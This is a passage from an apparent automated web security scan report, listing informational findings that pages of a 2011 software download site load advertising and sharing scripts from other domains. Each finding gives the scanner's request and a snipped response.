Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91507


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1378. http://www.x64bitdownload.com/64-bit-posts-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-posts-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-posts-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:00:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:54 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22posts%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22posts%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89038


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1379. http://www.x64bitdownload.com/64-bit-rar-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rar-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-rar-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:51 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91323


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1380. http://www.x64bitdownload.com/64-bit-reader-c-44-newsgroup-clients-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-reader-c-44-newsgroup-clients-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-reader-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:04 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:26 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45335


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1381. http://www.x64bitdownload.com/64-bit-reader-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-reader-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-reader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:56 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98206


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1382. http://www.x64bitdownload.com/64-bit-reading-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-reading-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-reading-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:40 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90299


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1383. http://www.x64bitdownload.com/64-bit-rss-c-44-newsgroup-clients-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rss-c-44-newsgroup-clients-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-rss-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:46 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30665


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1384. http://www.x64bitdownload.com/64-bit-rss-client-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rss-client-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-rss-client-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:11 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92234


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1385. http://www.x64bitdownload.com/64-bit-rss-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rss-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-rss-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:41 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:45 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88508


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1386. http://www.x64bitdownload.com/64-bit-rss-feed-reader-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rss-feed-reader-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-rss-feed-reader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:59:53 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22rss-feed-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22rss+feed+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93717


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1387. http://www.x64bitdownload.com/64-bit-rss-reader-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rss-reader-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-rss-reader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:16 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99929


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1388. http://www.x64bitdownload.com/64-bit-search-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-search-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-search-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:22 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91980


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1389. http://www.x64bitdownload.com/64-bit-ssl-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-ssl-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-ssl-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:51:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:06 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87821


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1390. http://www.x64bitdownload.com/64-bit-synchronization-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-synchronization-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-synchronization-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90120


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1391. http://www.x64bitdownload.com/64-bit-synchronize-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-synchronize-downloads.html

